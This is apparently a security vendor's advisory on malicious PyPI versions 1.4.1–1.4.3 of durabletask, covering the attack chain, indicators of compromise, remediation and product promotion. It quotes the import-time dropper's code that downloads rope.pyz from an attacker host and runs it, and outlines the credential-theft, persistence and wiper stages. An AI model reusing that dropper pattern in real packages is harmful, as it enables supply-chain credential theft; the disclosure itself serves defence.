What does the durabletask malware do?

**1.4.1**, **1.4.2**, and **1.4.3** of `durabletask` were compromised via a **PyPI maintainer account takeover**. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to `<=1.4.0`. **Attack chain** - *Stage 1 — Import-time dropper:* on import, the package fetches a second-stage payload `rope.pyz` from `check.git-service.com` (`160.119.64.3`). The TLS certificate for this C2 was issued on 2026-05-16, indicating ~3 days of pre-attack staging. - *Stage 2 — Credential-theft framework:* - AWS / Azure / GCP IMDS interrogation and Secrets Manager dumps - Kubernetes lateral movement via in-cluster service-account tokens - HashiCorp Vault

Which versions of durabletask are malicious?

The following PyPI versions of durabletask are flagged malicious: 1.4.1, 1.4.2, 1.4.3. Treat any of these as compromised.

How do I remediate durabletask if I installed it?

durabletask is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed durabletask — how do I know if it already compromised me?

If durabletask was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is durabletask part of a known attack campaign?

Yes — durabletask is associated with the 2026-05-compr-durabletask, IN-MAL-2026-003202, IN-MAL-2026-003579 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find durabletask across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for durabletask (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging durabletask across your stack and pipelines.

Malicious package

durabletaskPyPI

Malicious code in durabletask (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-4174

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall durabletask

What this malware does

1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to <=1.4.0.

Attack chain

Stage 1 — Import-time dropper: on import, the package fetches a second-stage payload rope.pyz from check.git-service.com (160.119.64.3). The TLS certificate for this C2 was issued on 2026-05-16, indicating ~3 days of pre-attack staging.
Stage 2 — Credential-theft framework:
- AWS / Azure / GCP IMDS interrogation and Secrets Manager dumps
- Kubernetes lateral movement via in-cluster service-account tokens
- HashiCorp Vault token extraction
- Harvesting from 85 known filesystem credential paths
- Brute-forcing of local password manager vaults
Exfiltration: stolen data is encrypted and shipped to the primary C2, with a dead-drop fallback that pushes encrypted blobs as GitHub commits (FIRESCALE-style egress).
Persistence: systemd unit pgsql-monitor.service.
Destructive payload: a geotargeted wiper activates on hosts identified as being located in Israel or Iran.

Indicators of compromise

C2 (primary): check.git-service.com — 160.119.64.3
C2 (secondary): t.m-kosche.com — 185.95.159.32
Dropped payload: rope.pyz
Persistence unit: pgsql-monitor.service

Recommended actions

Pin durabletask to <=1.4.0.
Block both C2 domains at network egress.
Treat any Linux system that imported 1.4.1 / 1.4.2 / 1.4.3 as fully compromised — rotate all reachable secrets and rebuild affected hosts.

On every import durabletask, the package's top-level __init__.py (lines 8-11) calls urllib.request.urlretrieve('https://check.git-service.com/rope.pyz', '/tmp/managed.pyz') and then subprocess.Popen(['python3', '/tmp/managed.pyz'], start_new_session=True) on Linux. The fetched zipapp is executed with no hash or signature verification, in a detached session. The destination check.git-service.com is a generic-git-service lookalike domain unrelated to the legitimate publisher of durabletask (Microsoft / microsoft/durabletask-python on github.com). The trigger is module import — not pip install — so install-phase sandboxes (pip download, pip wheel, build isolation) never observe the network activity; the dropper fires when the package is loaded in CI, production, or a developer's interpreter. The pattern (plaintext additive trailing block in __init__.py, Linux platform gate, .pyz staged to /tmp/ and handed to python3, lookalike git-<project>.com-style C2) matches a known import-time dropper campaign and is structurally indistinguishable from a stolen-publish-credential compromise of a legitimate package.

Versions 1.4.1, 1.4.2, 1.4.3 were compromised.

During import of compromised versions, the malicious code is downloaded and executed. It exfiltrates all kinds of credentials and sensitive files, including data from secret and password managers, SSH keys, configuration files. Code tries to achieve a persistence via systemd unit.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-compr-durabletask

Reasons (based on the campaign):

files-exfiltration
exfiltration-env-variables
exfiltration-ssh-keys
exfiltration-cloud-tokens
Downloads and executes a remote malicious script.
exfiltration-credentials
persistence
compromised-package

Malicious versions

3 flagged

1.4.11.4.21.4.3

Indicators of compromise (SHA-256)

d7cd06c24c677da1e7b5c2f4df3b2d696dfbcf8548357b512ed16c659c4c7b66

9c23380bb017a417e3f26575c5b96e32fb0bf11dec8314d16f8b979052748049

295bb15ad476455cabcf58b33fa9b8cb1ff65733d648de314703dd119c171741

78c753d3badef7f806bd71d60c2bb890ccc969a3fb360596e2872ae580d135f8

70afb57cbcdb03eb986b0e6d3f0f32c2dfc696ca54ed063ac0c3dad1f323cbd6

daa176998359c04f9e002ff27fa947f12f08ddf49648ac7444ca894602317662

48304d20771195ab837cc038cbcd5efd2552d123b890df0dc57ccef477b7ee5d

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for durabletask (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging durabletask across your stack and pipelines.
If you installed it — respond
durabletask is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If durabletask was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks durabletask before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. durabletask on PyPI has been identified as a malicious package (versions 1.4.1, 1.4.2, 1.4.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-05-compr-durabletaskIN-MAL-2026-003202IN-MAL-2026-003579

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · analyst
SafeDep · finder

Detect & block this

O3 blocks durabletask-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring